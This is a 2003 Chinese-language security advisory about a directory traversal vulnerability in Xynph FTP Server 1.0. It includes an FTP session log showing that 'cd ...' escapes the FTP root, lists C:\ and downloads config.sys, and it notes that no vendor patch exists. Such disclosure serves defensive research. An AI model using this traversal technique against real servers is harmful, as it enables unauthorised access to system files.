安全研究
安全漏洞
Xynph FTP Server相对路径目录遍历漏洞
发布日期:2003-01-11
更新日期:2003-01-17
受影响系统:
Xynph FTP Server Xynph FTP Server 1.0描述:
BUGTRAQ ID: 6587
Xynph FTP是一款小型FTP服务程序,可使用在Windows操作系统上。
Xynph FTP服务程序对用户提交的命令缺少正确检查,远程攻击者可以利用这个漏洞进行目录遍历攻击,以FTP进程权限查看系统任意文件。
攻击者可以向FTP服务程序提交带包含多个'../'字符参数的命令,由于FTP服务程序缺少正确过滤,可绕过FTP ROOT限制,未授权访问系统任意文件。
<*来源:Zero-X www.lobnan.de Team (zero-x@linuxmail.org)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104233757231148&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#######################################################
Verbindung mit zero-x.
220 Herzlich Willkommen!
<-Xynph FTP-Server->
Benutzer (zero-x:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> pwd
257 "C:/Temp/" is current directory.
Ftp> cd ..
501 CWD failed. No permission
Ftp> cd ...
250 CWD command successful. "C:/Temp/.../" is current directory.
Ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 .
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 ..
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Programme
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 command.com
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Autoexec.bat
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 config.sys
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Windows
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Cygwin
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Top-Secret
226 File sent ok
Ftp: 31337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
Ftp> get config.sys
200 Port command successful.
150 Opening data connection for config.sys.
226 File sent ok
Ftp: 1337 Bytes empfangen in 0.06Sekunden 2.92KB/Sek.
Ftp>
#######################################################
建议:
厂商补丁:
Xynph FTP Server
----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.digital-sector.de/
浏览次数:3907
严重程度:0(网友投票)
绿盟科技给您安全的保障